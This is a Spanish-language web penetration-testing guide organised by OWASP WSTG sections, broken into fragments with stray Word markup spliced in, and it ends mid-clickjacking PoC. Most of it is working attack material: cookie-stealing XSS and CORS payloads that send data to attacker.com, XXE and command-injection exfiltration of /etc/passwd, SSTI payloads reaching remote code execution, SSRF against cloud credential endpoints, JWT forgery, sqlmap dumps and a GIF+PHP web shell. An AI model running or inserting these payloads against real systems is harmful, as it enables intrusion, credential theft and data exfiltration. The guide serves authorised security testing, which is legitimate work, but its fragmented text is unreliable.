200 OK (semicolon injection en Spring)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/api/v1/../admin/users =&gt; 200 OK (path normalization bypass)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4.5.4 IDOR (WSTG-ATHZ-04)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Metodologia completa de IDOR con OpenClaw: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1: Autenticarse como Usuario A (ID=100)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token_A=$(curl -s -X POST https://objetivo.com/login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-d 'user=userA&amp;pass=passA' | jq -r .token)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2: Obtener lista de recursos de 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-H "Authorization: Bearer $token_A"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https://objetivo.com/api/invoices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Resultado: [{"id":1001}, {"id":1002}, {"id":1003}]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3: Autenticarse como Usuario B (ID=200)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token_B=$(curl -s -X POST https://objetivo.com/login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-d 'user=userB&amp;pass=passB' | jq -r .token)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4: Con token de B, intentar acceder a recursos de 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-H "Authorization: Bearer $token_B"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https://objetivo.com/api/invoices/1001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 esperado (seguro): HTTP 403 Forbidden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 vulnerable: HTTP 200 OK + datos de la factura de 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5: Escalar — intentar operaciones destructivas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-X DELETE -H "Authorization: Bearer $token_B"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https://objetivo.com/api/invoices/1001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borra la factura de A =&gt; CRITICO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IDOR en parametros no obvios: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IDs en base64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/api/document?id=MTAwMQ==   # MTAwMQ== = base64('1001')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Probar: base64('1002') = MTAwMg==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IDs en hash MD5 secuencial (anti-pattern comun)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/api/user/5f4dcc3b5aa765d61d8327deb882cf99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MD5('password') =&gt; usuario nombrado 'password'? No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MD5('1'), MD5('2')... enumerar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IDOR en nombre de archivo de descarga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/download/user_100_report.pdf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Probar: GET /download/user_101_report.pdf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IDOR en referencia indirecta (GUID)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/api/orders/f47ac10b-58cc-4372-a567-0e02b2c3d479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GUIDs v1 son predecibles por timestamp =&gt; herramienta: guid-utils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Autorizacion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ATHZ-01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Directory Traversal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lectura de archivos fuera del webroot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Traversal payloads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ATHZ-02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Bypass de autorizacion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acceso a recursos no permitidos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 manipulation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ATHZ-03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Escalada de privilegios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elevacion horizontal ni vertical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/ cookie tampering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ATHZ-04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IDOR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IDs verificados por ownership en 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Cross-user ID test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7. Gestion de Sesion (WSTG 4.6)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4.6.1 Esquema de Sesion (WSTG-SESS-01)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Analisis de token de sesion — entropia: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Recolectar 50 tokens para analisis estadistico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for i in $(seq 1 50); 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curl -c /tmp/cookie_$i -s https://objetivo.com/ &gt; /dev/null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cat /tmp/cookie_$i | grep -v '^#' | awk '{print $7}'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done &gt; tokens.txt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Analizar con OWASP SessionID Analysis Tool o Burp Sequencer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Buscar: patrones, secuencialidad, correlacion con timestamp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Ejemplo de token INSEGURO (secuencial):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session=user100_1709001234    # user_id + timestamp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session=user100_1709001235    # siguiente sesion, diferencia de 1 segundo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Ejemplo de token SEGURO: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session=8f14e45f-ceea-4674-b27a-a82c21d1eacb  # UUID v4 (128 bits aleatorios)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session=a3f5c2d9e8b4f1a7b6d3e9f2  # 128 bits hexadecimales aleatorios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Analisis de JWT — vulnerabilidades comunes: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Decodificar JWT (sin verificar firma)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echo 'eyJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoxMDAsInJvbGUiOiJ1c2VyIn0.XXXX' |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cut -d. -f2 | base64 -d 2&gt;/dev/null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Resultado: {"user_id":100,"role":"user"}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Ataque 1: Algoritmo 'none'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header_none=$(echo -n '{"alg":"none","typ":"JWT"}' | base64 | tr -d '=')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payload_mod=$(echo -n '{"user_id":100,"role":"admin"}' | base64 | tr -d '=')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jwt_none="$header_none.$payload_mod."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Ataque 2: Confusion RS256-&gt;HS256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el servidor usa RS256 con clave publica, algunos libs aceptan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HS256 firmado con la clave PUBLICA (que es conocida)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python3 jwt_tool.py TOKEN -X k -pk public_key.pem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Ataque 3: Brute force de clave HS256 debil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hashcat -a 0 -m 16500 jwt.txt /usr/share/wordlists/rockyou.txt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Herramienta integral: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python3 jwt_tool.py eyJhbGc... -T  # Tamper mode interactivo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4.6.2 Atributos de Cookies (WSTG-SESS-02)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Verificacion de atributos de seguridad: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-I https://objetivo.com/login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 INSEGURA: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Set-Cookie: session=abc123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Sin Secure: transmisible por HTTP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Sin HttpOnly: accesible desde JavaScript (XSS puede robar la cookie)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Sin SameSite: vulnerable a CSRF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 SEGURA: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Set-Cookie: session=abc123; Secure; HttpOnly; SameSite=Strict; Path=/; Max-Age=3600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Script de verificacion automatica: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-c cookies.txt https://objetivo.com/login -s &gt; /dev/null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cat cookies.txt | grep -v '^#'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columnas: HttpOnly (1=si), Secure (buscar flag)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4.6.3 Fijacion de Sesion (WSTG-SESS-03)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de session fixation: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1: Obtener token de sesion pre-login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-c pre_login.txt https://objetivo.com/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cat pre_login.txt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session=PRE_LOGIN_TOKEN_AAAA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2: Autenticarse usando ese token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-b 'session=PRE_LOGIN_TOKEN_AAAA'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-X POST https://objetivo.com/login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-d 'user=admin&amp;pass=Admin123'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3: Verificar si el token cambio post-login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-b 'session=PRE_LOGIN_TOKEN_AAAA' https://objetivo.com/profile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retorna datos de admin usando el token PRE_LOGIN =&gt; ALTO: Session Fixation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El atacante puede establecer el token y esperar a que la victima lo use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 SEGURA: el servidor emite un NUEVO token despues del login exitoso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Set-Cookie: session=NEW_TOKEN_BBBB  # diferente al pre-login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4.6.5 CSRF (WSTG-SESS-05)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de CSRF en cambio de email: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1: Capturar request legitimo de cambio de email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/account/change-email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Host: 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Cookie: session=abc123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Content-Type: application/x-www-form-urlencoded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new_email=legitimo@user.com&amp;csrf_token=XXXXXXX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2: Crear pagina HTML de ataque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(hospedar en attacker.com)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&lt;!-- PoC CSRF - guardar como csrf_poc.html en attacker.com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&lt;html&gt;&lt;body onload="document.forms[0].submit()"&gt;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&lt;form action="https://objetivo.com/account/change-email" method="POST"&gt;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&lt;input type="hidden" name="new_email" value="attacker@evil.com"&gt;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&lt;!-- Sin csrf_token: el servidor no lo verifica?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&lt;/form&gt;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&lt;/body&gt;&lt;/html&gt;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3: Victima visita attacker.com/csrf_poc.html mientras esta autenticada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el email cambia a attacker@evil.com =&gt; ALTO: CSRF sin proteccion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Variante con fetch (para APIs JSON):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fetch('https://objetivo.com/api/change-email',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method: 'POST',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credentials: 'include',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headers: {'Content-Type': 'application/json'},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body: JSON.stringify({email: 'attacker@evil.com'})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})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4.6.6 Funcionalidad de Logout (WSTG-SESS-06)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1: Autenticarse y guardar token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-c session.txt -X POST https://objetivo.com/login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-d 'user=admin&amp;pass=Admin123'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token=$(grep session session.txt | awk '{print $7}')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2: Verificar acceso autenticado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-b "session=$token" https://objetivo.com/profile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200 OK con datos de perfil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3: Hacer logout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-b "session=$token" -X POST https://objetivo.com/logout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4: Intentar usar el mismo token post-logout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-b "session=$token" https://objetivo.com/profile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INSEGURO: HTTP 200 OK con datos del perfil (token sigue valido en servidor)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SEGURO:   HTTP 302 Redirect a /login (token invalidado en servidor)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tambien que la cookie sea eliminada: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Set-Cookie: session=; Expires=Thu, 01 Jan 1970 00:00:00 GMT; Path=/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Gestion de Sesion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Esquema de sesion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con &gt;=128 bits de entropia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Burp Sequencer / JWT tool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Atributos de cookies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Secure+HttpOnly+SameSite presentes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curl -I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Fijacion de sesion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Nuevo token emitido post-login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Pre/post-login token compare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en URLs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no aparece en URL ni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Traffic analysis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CSRF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anti-CSRF verificado en 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CSRF PoC HTML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invalidado en servidor post-logout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Post-logout reuse test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Timeout de sesion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Expiracion por inactividad &lt;=30min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Idle session test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puzzling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reutilizacion ambigua de vars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Analisis manual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Secuestro de sesion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vectores de robo de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XSS / MITM check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8. Validacion de Entrada (WSTG 4.7)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SECCION CRITICA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Esta seccion cubre las vulnerabilidades de mayor impacto. Ejecutar estas pruebas solo con autorizacion escrita. Algunos payloads pueden causar impacto en bases de datos o servicios.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4.7.1 XSS Reflejado (WSTG-INPV-01)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Payloads por contexto de inyeccion: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Contexto HTML (dentro de etiqueta o texto plano):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 XSS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 y uso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&lt;script&gt;alert(document.domain)&lt;/script&gt;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Payload basico, detecta contexto HTML directo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"&gt;&lt;script&gt;alert(1)&lt;/script&gt;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Cierra atributo + inyecta script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'&gt;&lt;img src=x onerror=alert(1)&gt;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Alternativa sin script, funciona con CSP basica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&lt;svg onload=alert(1)&gt;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SVG event handler, bypasea filtros de script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&lt;details open ontoggle=alert(1)&gt;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HTML5 event, no requiere interaccion en Firefox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&lt;iframe src=javascript:alert(1)&gt;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javascript: URI en atributo src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&lt;body onload=alert(1)&gt;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Requiere que se inyecte en el body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Contexto dentro de atributo HTML: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se inyecta en: &lt;input value="INYECCION" type="text"&gt;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" onmouseover="alert(1)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" onfocus="alert(1)" autofocus="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" onblur="alert(1)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se inyecta en: &lt;a href="INYECCION"&gt;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javascript:alert(document.cookie)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javascript:alert(1)//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Contexto dentro de JavaScript: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la app hace: var x = 'INYECCION';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';alert(document.domain)//'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'-alert(1)-'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\'; alert(1)//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usa template literals: `Hola ${INYECCION}`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${alert(1)}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se usa en JSON: {"name": "INYECCION"}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\"};alert(1);//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Bypass de filtros comunes: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Filtro elimina 'script' =&gt; case variation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&lt;ScRiPt&gt;alert(1)&lt;/ScRiPt&gt;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&lt;SCRIPT&gt;alert(1)&lt;/SCRIPT&gt;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Filtro elimina 'alert' =&gt; alternativas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&lt;script&gt;confirm(1)&lt;/script&gt;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&lt;script&gt;prompt(1)&lt;/script&gt;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&lt;script&gt;eval(String.fromCharCode(97,108,101,114,116,40,49,41))&lt;/script&gt;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Filtro elimina &lt;&gt; =&gt; encoding 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&amp;lt;script&amp;gt;alert(1)&amp;lt;/script&amp;gt;   # no funciona si el encode es del browser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Doble encoding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%253Cscript%253Ealert(1)%253C/script%253E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Null bytes (algunos parsers)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&lt;scr%00ipt&gt;alert(1)&lt;/scr%00ipt&gt;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XSS para robo de cookies (payload real):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Payload que exfiltra cookies a servidor del atacante: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new Image().src='https://attacker.com/steal?c='+encodeURIComponent(document.cookie);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&lt;/script&gt;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Alternativa via fetch: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&lt;script&gt;fetch('https://attacker.com/steal?c='+btoa(document.cookie))&lt;/script&gt;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XSS que roba el token CSRF para encadenar con CSRF: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fetch('/account/settings').then(r=&gt;r.text()).then(h=&gt;{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let tok=h.match(/csrf_token.*?value=["']([^"']+)/)[1];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fetch('https://attacker.com/tok?t='+tok);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&lt;/script&gt;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4.7.2 XSS Almacenado (WSTG-INPV-02)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Vectores de inyeccion para XSS almacenado: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Campo de comentario en blog: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/api/comments {"text": "&lt;script&gt;alert(document.domain)&lt;/script&gt;"}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Campo de nombre de usuario en perfil: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PUT /api/profile {"name": "&lt;img src=x onerror=alert(1)&gt;"}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Ticket de soporte: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/support {"subject": "Problema", "body": "&lt;svg onload=alert(1)&gt;"}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Campo de nombre en admin panel (XSS almacenado que solo ve el admin):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Permite robo de sesion de administrador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URL en campo de website de usuario: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PUT /api/profile {"website": "javascript:alert(1)"}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se renderiza como &lt;a href='javascript:alert(1)'&gt; =&gt; XSS al hacer click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Payload en metadata de archivo subido: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exiftool -Comment='&lt;script&gt;alert(1)&lt;/script&gt;' imagen.jpg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la app muestra los metadatos en HTML sin escapar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4.7.5 SQL Injection (WSTG-INPV-05)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Deteccion de SQL Injection — tecnicas por tipo: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Error-based detection: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de sintaxis SQL basico. Respuesta diferente = potencial SQLi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''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 comillas simples - recovery del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AND 1=1--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 condition - debe comportarse igual que sin payload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AND 1=2--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 condition - resultado diferente = SQLi booleana confirmada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AND SLEEP(5)--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Time-based: si tarda 5s adicionales = SQLi confirmada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'; WAITFOR DELAY '0:0:5'--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Time-based para MSSQL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AND 1=CONVERT(int,'a')--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Error-based MSSQL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AND EXTRACTVALUE(1,CONCAT(0x7e,version()))--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Error-based MySQL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AND 1=1 UNION SELECT null--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Union-based: ajustar numero de columnas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SQLi Union-based — extraccion de datos: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1: Determinar numero de columnas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ORDER BY 1--   ' ORDER BY 2--   ' ORDER BY 3--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Cuando cambia el error: tiene N-1 columnas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UNION SELECT NULL--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UNION SELECT NULL,NULL--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UNION SELECT NULL,NULL,NULL--  # continuar hasta sin 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2: Encontrar columna que muestra datos de texto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UNION SELECT 'a',NULL,NULL--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UNION SELECT NULL,'a',NULL--   # continuar hasta ver 'a' en respuesta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3: Extraer datos (MySQL):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UNION SELECT table_name,NULL FROM information_schema.tables--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UNION SELECT column_name,NULL FROM information_schema.columns WHERE table_name='users'--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UNION SELECT username,password FROM users--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Paso 4: Extraer datos en columna unica (concatenar):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UNION SELECT CONCAT(username,':',password),NULL FROM users--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SQLi Blind boolean-based — extraccion caracter a caracter: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Pregunta: el primer caracter del nombre de la DB es 'p'?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' AND SUBSTRING(database(),1,1)='p'--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la respuesta es igual a la original =&gt; True =&gt; primera letra es 'p'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Automatizar con sqlmap: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sqlmap -u 'https://objetivo.com/product?id=1' --dbs --batch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sqlmap -u 'https://objetivo.com/product?id=1' -D produccion --tables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sqlmap -u 'https://objetivo.com/product?id=1' -D produccion -T users --dump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Para POST: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sqlmap -u 'https://objetivo.com/login'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--data='username=admin&amp;password=test'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-p username --dbs --batch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Para cookies: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sqlmap -u 'https://objetivo.com/profile'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--cookie='session=abc123; user_id=1'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-p user_id --dbs --batch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SQLi especifica por motor de base de datos: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00"/>
        <w:gridCol w:w="27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MySQL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MSSQL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Oracle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@@version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@@version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SELECT banner FROM v$version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DB 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database()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DB_NAME()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SELECT ora_database_name FROM dual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Tablas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information_schema.tables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INFORMATION_SCHEMA.TABLES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all_tables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SLEEP(5)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WAITFOR DELAY '0:0:5'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dbms_pipe.receive_message('x',5)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String concat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CONCAT(a,b)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a+b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a||b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Comentario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-- o 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--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--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4.7.7 XML/XXE Injection (WSTG-INPV-07)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Payloads XXE — lectura de archivos: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XXE basico - Linux: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&lt;?xml version="1.0" encoding="UTF-8"?&gt;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&lt;!DOCTYPE foo [&lt;!ENTITY xxe SYSTEM "file:///etc/passwd"&gt;]&gt;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&lt;root&gt;&lt;data&gt;&amp;xxe;&lt;/data&gt;&lt;/root&gt;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XXE basico - Windows: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&lt;?xml version="1.0"?&gt;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&lt;!DOCTYPE foo [&lt;!ENTITY xxe SYSTEM "file:///C:/Windows/win.ini"&gt;]&gt;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&lt;root&gt;&lt;data&gt;&amp;xxe;&lt;/data&gt;&lt;/root&gt;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XXE para SSRF (acceder a servicios internos):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&lt;?xml version="1.0"?&gt;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&lt;!DOCTYPE foo [&lt;!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/"&gt;]&gt;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&lt;root&gt;&lt;data&gt;&amp;xxe;&lt;/data&gt;&lt;/root&gt;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169.254.169.254 = metadata de AWS EC2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XXE Out-of-Band (cuando no se muestra el output en respuesta):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&lt;?xml version="1.0"?&gt;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&lt;!DOCTYPE foo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&lt;!ENTITY % dtd SYSTEM "http://attacker.com/evil.dtd"&gt;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%dtd;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]&gt;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&lt;root&gt;&lt;data&gt;&amp;exfil;&lt;/data&gt;&lt;/root&gt;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evil.dtd en attacker.com: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&lt;!ENTITY % file SYSTEM "file:///etc/passwd"&gt;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&lt;!ENTITY % eval "&lt;!ENTITY exfil SYSTEM 'http://attacker.com/?data=%file;'&gt;"&gt;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%eval;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4.7.12 Command Injection (WSTG-INPV-12)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Payloads de command injection por sistema operativo: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Operadores de encadenamiento Unix/Linux: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; whoami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 despues del comando original (siempre)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&amp; whoami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 en background, continua el original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&amp;&amp; whoami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 solo si el original tuvo exito (AND)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|| whoami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 solo si el original fallo (OR)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| whoami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Pipe: output del primero como input del segundo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`whoami`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Backtick: substitucion de comando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$(whoami)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Dollar-parenthesis: substitucion de comando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%0awhoami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Newline injection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; ping -c 5 attacker.com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Time-based detection via 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; curl http://attacker.com/$(whoami)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Exfiltracion de output via HTTP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Ejemplos en contextos de aplicacion reales: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Campo de hostname en utilidad de ping de la app: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/tools/ping {"host": "8.8.8.8; whoami"}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Campo de nombre de archivo en conversion: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/convert {"filename": "document.pdf; ls -la /"}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Parametro de email en notificaciones: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/notify {"email": "test@test.com; cat /etc/passwd | curl -d @- http://attacker.com"}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Time-based blind (cuando no se muestra output):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/tools/lookup {"domain": "objetivo.com; sleep 5"}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la respuesta tarda 5s adicionales =&gt; RCE confirmado sin output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Exfiltracion via DNS (cuando HTTP bloqueado):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/tools/ping {"host": "$(whoami).attacker.com"}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Revisar logs de DNS en attacker.com: www-data.attacker.com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4.7.18 Server-Side Template Injection (WSTG-INPV-18)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Payloads de deteccion por motor de plantillas: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Motor de plantillas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{{7*7}}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Jinja2/Twig/Tornado - debe devolver '49'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${7*7}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Freemarker/Thymeleaf - debe devolver '49'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&lt;%= 7*7 %&gt;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ERB (Ruby) - debe devolver '49'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#{7*7}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Pug (Node.js) - debe devolver '49'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*{7*7}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Thymeleaf selection expressions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{{7*'7'}}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Jinja2 devuelve '7777777', Twig devuelve '49'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{{'a'.toUpperCase()}}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Pebble Java template engine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@(7*7)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Razor (ASP.NET)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SSTI en Jinja2 (Python) — escalada a RCE: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Deteccion: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{{7*7}}  =&gt; 49 en respuesta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Ejecucion de comandos via Jinja2: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{{config.__class__.__init__.__globals__['os'].popen('id').read()}}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Alternativa mas robusta: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{% for x in ().__class__.__base__.__subclasses__() %}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{% if 'warning' in x.__name__ %}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{{x()._module.__builtins__['__import__']('os').popen('id').read()}}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{% endif %}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{% endfor %}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SSTI en Freemarker (Java):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&lt;#assign ex="freemarker.template.utility.Execute"?new()&gt;${ex("id")}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SSTI en Pebble (Java):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{{variable.getClass().forName('java.lang.Runtime').getMethod('exec',''.getClass()).invoke(variable.getClass().forName('java.lang.Runtime').getMethod('getRuntime').invoke(null),'id')}}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4.7.19 SSRF — Server-Side Request Forgery (WSTG-INPV-19)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Payloads y objetivos de SSRF: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Deteccion basica — hacer que el servidor contacte attacker.com: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/api/fetch {"url": "https://attacker.com/ssrf-test"}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attacker.com recibe el request =&gt; SSRF confirmado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SSRF hacia metadata de cloud (AWS):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/api/fetch {"url": "http://169.254.169.254/latest/meta-data/"}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/api/fetch {"url": "http://169.254.169.254/latest/meta-data/iam/security-credentials/"}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Puede revelar: Access Keys de AWS de la instancia EC2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SSRF hacia metadata de GCP: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/api/fetch {"url": "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token"}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SSRF hacia servicios internos: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/api/fetch {"url": "http://localhost:8080/actuator/env"}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/api/fetch {"url": "http://internal-db:3306"}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/api/fetch {"url": "http://192.168.1.1/admin"}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SSRF bypass de filtros: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http://127.0.0.1/           # localhost IPv4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http://[::1]/               # localhost IPv6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http://0.0.0.0/             # INADDR_ANY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http://127.1/               # notacion acortada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http://2130706433/          # 127.0.0.1 en decimal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http://0177.0.0.01/         # 127.0.0.1 en octal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http://spoofed.attacker.com/# DNS que resuelve a 127.0.0.1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Validacion de Entrada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XSS Reflejado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ejecucion de scripts en respuesta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XSS payloads / Burp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XSS Almacenado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payload persistente en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Stored XSS test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Verb Tampering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Controles no bypasseables por verbo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Method override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Parameter Pollution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Params duplicados manejados seguro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Duplicate params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Queries parametrizadas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sqlmap / payloads manuales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LDAP Injection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Filtros LDAP sanitizados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LDAP payloads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XXE Injection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Entidades XML externas deshabilitadas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XXE payloads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SSI Injection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directivas SSI procesadas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SSI payloads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XPath Injection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Consultas XPath parametrizadas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XPath payloads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LFI / RFI / Code Injection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inclusion de archivos externos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Path traversal / URL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Command Injection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ejecucion de OS commands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 cmd payloads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 Header Injection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 Host validado en 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 manipulation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SSTI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inyeccion en templates del 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{{7*7}} payloads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INPV-19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SSRF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requests a recursos internos/cloud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 URL + OOB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9. Manejo de Errores (WSTG 4.8)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4.8.1 Manejo Impropio de Errores (WSTG-ERRH-01)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Tecnicas para provocar errores y ejemplos de respuestas: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Tipo de datos inesperado — entero en lugar de string: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/api/users?name[]=test HTTP/1.1   # Array en lugar de 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 INSEGURA (stack trace en produccion):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HTTP/1.1 500 Internal Server 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Content-Type: text/html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Warning: mysql_fetch_assoc() expects parameter 1 to be resource,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boolean given in /var/www/html/includes/db.php on line 47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Stack trace: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#0 /var/www/html/api/users.php(23): getUser(Array)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#1 /var/www/html/index.php(156): include('/var/www/html/api/users.php')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Revela: rutas del servidor, nombre de archivos, numero de linea, tecnologia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 SEGURA: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HTTP/1.1 500 Internal Server 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{"error": "Internal server error", "reference": "ERR-20240315-001"}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SQLi para provocar error con informacion de BD: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/product?id=1'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INSEGURO — error MySQL expuesto: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You have an error in your SQL syntax; check the manual that corresponds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to your MySQL server version for the right syntax to use near '''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at line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Query: SELECT * FROM products WHERE id='1''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Revela: tipo de BD (MySQL), query SQL completa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Acceso a recurso inexistente — error 404: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/esta-ruta-no-existe HTTP/1.1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INSEGURO — IIS revela version en pagina de error por defecto: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404 - File or directory not found.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Server Version Information: Microsoft-IIS/10.0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SEGURO — pagina de error personalizada sin info sensible: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HTTP/1.1 404 Not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&lt;html&gt;&lt;body&gt;Pagina no encontrada. &lt;a href='/'&gt;Volver al inicio&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;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Payload JSON malformado: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/api/users  Content-Type: application/json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Body: {"user": "test", "broken_json":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INSEGURO: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SyntaxError: Unexpected end of JSON input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at JSON.parse (&lt;anonymous&gt;)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at /app/node_modules/body-parser/lib/types/json.js:88:16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at /app/routes/api.js:45:7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=&gt; Revela: stack trace de Node.js, rutas de archivos, modulos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Manejo de Errores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ERRH-01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Manejo impropio de errores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Errores genericos sin info tecnica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triggering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ERRH-02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Stack traces visibles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Stack traces ocultos en produccion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Exception test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10. Criptografia Debil (WSTG 4.9)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4.9.1 TLS Debil (WSTG-CRYP-01)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Analisis completo de TLS con testssl.sh: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Escaneo completo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testssl.sh --full https://objetivo.com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 — INSEGURO (ejemplo):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SSLv3      VULNERABLE (POODLE CVE-2014-3566)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TLS 1.0    offered (deprecated, BEAST CVE-2011-3389)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TLS 1.1    offered (deprecated)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TLS 1.2    offered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Cipher suite: DES-CBC3-SHA        WEAK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Cipher suite: RC4-SHA             WEAK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Cipher suite: EXPORT-RC4-MD5      VULNERABLE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Cipher suite: TLS_RSA_WITH_AES_128_CBC_SHA  ACCEPTABLE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Cipher suite: TLS_AES_256_GCM_SHA384       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HEARTBLEED (CVE-2014-0160):  VULNERABLE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CCS injection (CVE-2014-0224): VULNERABLE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Certificate: expired (2023-01-15)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Certificate: self-signed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HSTS: not set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 SEGURO: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TLS 1.2    offered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TLS 1.3    offered and preferred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TLS 1.0    not offered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TLS 1.1    not offered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SSLv3      not offered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Cipher suite forward secrecy: ECDHE-RSA-AES256-GCM-SHA384 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HEARTBLEED: not vulnerable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HSTS: max-age=31536000; includeSubDomains; preload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Certificate: OK (expires: 2025-06-20, 420 days)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4.9.4 Cifrado Debil (WSTG-CRYP-04)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Verificacion de hashing de contrasenas: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Obtener hash de password de BD (via SQLi o acceso directo)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Hash MD5: 5f4dcc3b5aa765d61d8327deb882cf99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Es MD5('password') - CRITICO: MD5 sin sal, crackeable en segundos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con hashid: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hashid 5f4dcc3b5aa765d61d8327deb882cf99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[+] MD2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[+] MD5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Crackear con hashcat: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hashcat -a 0 -m 0 5f4dcc3b5aa765d61d8327deb882cf99 /usr/share/wordlists/rockyou.txt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 en segundos: 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Hash SHA1: aaf4c61ddcc5e8a2dabede0f3b482cd9aea9434d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SHA1('h'), tambien inseguro sin sal y factor de coste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Hash SEGURO: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bcrypt: $2y$12$XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX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Argon2: $argon2id$v=19$m=65536,t=3,p=4$XXXXXXXX$XXXXXXXX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El factor de coste (12 en bcrypt) determina el tiempo de computo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Criptografia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CRYP-01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TLS debil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Solo TLS 1.2/1.3, cipher suites fuertes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testssl.sh / sslyze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CRYP-02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Padding Oracle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vulnerabilidad de padding oracle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POET / padbuster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CRYP-03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Datos sensibles sin cifrar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 transporte sobre TLS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Traffic capture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CRYP-04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Cifrado debil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Contrasenas con bcrypt/Argon2/scrypt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Hash analysis / hashcat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11. Logica de Negocio (WSTG 4.10)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4.10.1 Validacion de Datos de Negocio (WSTG-BUSL-01)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Ejemplos de valores de negocio invalidos a probar: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 / Valor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de negocio potencial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quantity=-1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Cantidad negativa =&gt; saldo podria aumentar en vez de disminuir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price=0.00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Precio cero =&gt; obtener productos gratis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price=-100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Precio negativo =&gt; el carrito suma en vez de restar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discount=200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Descuento mayor al 100% =&gt; precio negativo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transfer_amount=999999999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Transferir mas de lo que existe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age=-5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Edad negativa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quantity=0.001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Fraccion de unidad en producto entero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end_date=2020-01-01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Fecha de fin antes de la de inicio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percentage=101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Porcentaje mayor a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email=a@b.cemail=a@b.cemail=a@b.cemail=a@b.cemail=a@b.cemail=a@b.cemail=a@b.cemail=a@b.cemail=a@b.cemail=a@b.c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excesivamente largo (buffer overflow logico)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4.10.4 Race Conditions (WSTG-BUSL-04)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de doble gasto con race condition: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Escenario: cupon de descuento de un solo uso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El flujo normal es: verificar cupon -&gt; aplicar -&gt; marcar como usado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Ataque: enviar N peticiones simultaneas antes de que se marque como usado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Herramienta: Burp Turbo Intruder o script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import threading, requests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import concurrent.futures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def use_coupon():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return requests.post('https://objetivo.com/apply-coupon',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json={'coupon': 'SAVE50', 'order_id': 12345},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headers={'Authorization': 'Bearer TOKEN_USUARIO'})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Lanzar 20 peticiones simultaneas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with concurrent.futures.ThreadPoolExecutor(max_workers=20) as executor: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futures = [executor.submit(use_coupon) for _ in range(20)]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for f in concurrent.futures.as_completed(futures):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print(f.result().status_code, f.result().json())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mas de una respuesta es 200 OK =&gt; cupon usado multiples veces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ALTO: Race condition permite abusar del sistema de cupones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Con Burp Turbo Intruder - script de ataque 'single-packet attack':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Send all requests in a single TCP packet para sincronizacion perfecta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4.10.8-09 Upload de Archivos (WSTG-BUSL-08/09)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Tecnicas de bypass de validacion de archivos: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Tecnica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shell.php -&gt; shell.jpg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Renombrar PHP como imagen para bypass de extension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shell.pHp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Variaciones de case en la extension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shell.php.jpg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Extension doble: el servidor puede procesar la primera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shell.php%00.jpg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 byte trunca el nombre en extension en algunos parsers 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shell.php5 / shell.phtml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Extensiones alternativas de PHP ejecutables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shell.asp;.jpg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Punto y coma en IIS: ejecuta como ASP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shell.ashx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Extension ASHX ejecutable en ASP.NET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Imagen GIF con PHP embed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GIF87a&lt;?php system($_GET['cmd']); ?&gt;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SVG con XSS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&lt;svg&gt;&lt;script&gt;alert(1)&lt;/script&gt;&lt;/svg&gt; como imagen SVG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ZIP bomb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Archivo ZIP de 1KB que se expande a 10GB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polyglot (GIF+PHP)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Archivo valido como GIF Y ejecutable como PHP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Crear polyglot GIF+PHP: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printf "GIF89a&lt;?php system(\$_GET['cmd']); ?&gt;" &gt; polyglot.gif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que el servidor detecte como GIF (magic bytes):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file polyglot.gif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polyglot.gif: GIF image data, version 89a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Subir como 'imagen' GIF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-F 'file=@polyglot.gif;type=image/gif' https://objetivo.com/upload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el archivo se sirve con Content-Type: image/gif pero se ejecuta como PHP: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'https://objetivo.com/uploads/polyglot.gif?cmd=id'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uid=33(www-data) =&gt; RCE via archivo polyglot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Logica de Negocio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BUSL-01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Validacion de datos de negocio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Valores imposibles rechazados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Boundary testing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BUSL-02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Forja de peticiones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acciones no autorizadas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manipulation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BUSL-03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Verificaciones de integridad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Integridad en flujos multi-paso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Multi-step tampering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BUSL-04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 conditions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doble gasto ni TOCTOU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Concurrent requests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BUSL-05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Limites de uso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Limites de funcion aplicados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Limit bypass test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BUSL-06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Evasion de workflows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salto de pasos obligatorios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step access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BUSL-07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Defensa contra mal uso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Deteccion de comportamiento anomalo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Automated requests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BUSL-08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tipos inesperados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Solo tipos permitidos aceptados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type bypass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BUSL-09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archivos maliciosos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Malware rechazado o en cuarentena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Polyglot / malicious files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12. Seguridad del Cliente (WSTG 4.11)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4.11.1 DOM-Based XSS (WSTG-CLNT-01)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Fuentes (sources) y destinos (sinks) peligrosos en JavaScript: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Sources (entradas no confiables)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Sinks (destinos peligrosos)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 de explotacion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location.hash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innerHTML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location.hash = '#&lt;img onerror=alert(1) src=x&gt;'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location.search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document.write()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?name=&lt;script&gt;alert(1)&lt;/script&gt;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document.referrer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eval()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Referrer con codigo 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window.name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setTimeout(string)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window.name = 'alert(1)'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postMessage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location.href = 'js:...'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postMessage('javascript:alert(1)')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localStorage/sessionStorage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src/href attribute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Payload almacenado en storage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manual de DOM XSS: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la app tiene: document.getElementById('output').innerHTML = location.hash.slice(1)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Payload en URL hash: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https://objetivo.com/page#&lt;img src=x onerror=alert(document.domain)&gt;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la app tiene: var x = new URLSearchParams(location.search).get('name');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                 document.write('Hola ' + x);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https://objetivo.com/greet?name=&lt;script&gt;alert(1)&lt;/script&gt;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Herramienta: DOMInvader (extension Burp) para tracking automatico source-&gt;sink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Herramienta: dalfox para DOM XSS automatico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dalfox url 'https://objetivo.com/page' --deep-domxss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4.11.7 CORS Misconfiguration (WSTG-CLNT-07)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Pruebas de politica CORS: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reflejo del Origin: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-H 'Origin: https://attacker.com'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-H 'Authorization: Bearer TOKEN'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https://objetivo.com/api/profile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 VULNERABLE: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Access-Control-Allow-Origin: https://attacker.com   # refleja el origen del atacante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Access-Control-Allow-Credentials: true              # permite cookies/auth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=&gt; PoC de explotacion (desde attacker.com):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fetch('https://objetivo.com/api/profile',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credentials: 'include'   // incluye cookies de la victima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}).then(r =&gt; r.json()).then(data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// Datos privados de la victima accesibles desde attacker.com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fetch('https://attacker.com/steal?d='+JSON.stringify(data));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 SEGURA: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Access-Control-Allow-Origin: https://app.objetivo.com  # dominio especifico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O: Access-Control-Allow-Origin: *  SIN Allow-Credentials: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CORS con null origin (bypass via sandbox iframe):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-H "Origin: null" https://objetivo.com/api/profile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Allow-Origin: null =&gt; vulnerable a explotacion via iframe sandboxeado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4.11.9 Clickjacking (WSTG-CLNT-09)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PoC de Clickjacking completo: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&lt;!-- PoC Clickjacking - hospedar en attacker.com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&lt;!-- La victima ve un boton atractivo pero en realidad hace click en la app objetivo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&lt;!DOCTYPE html&gt;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&lt;html&gt;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&lt;head&gt;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&lt;title&gt;Gana un Premio!&lt;/title&gt;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&lt;style&gt;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#target { position: absolute; top: 0; left: 0; 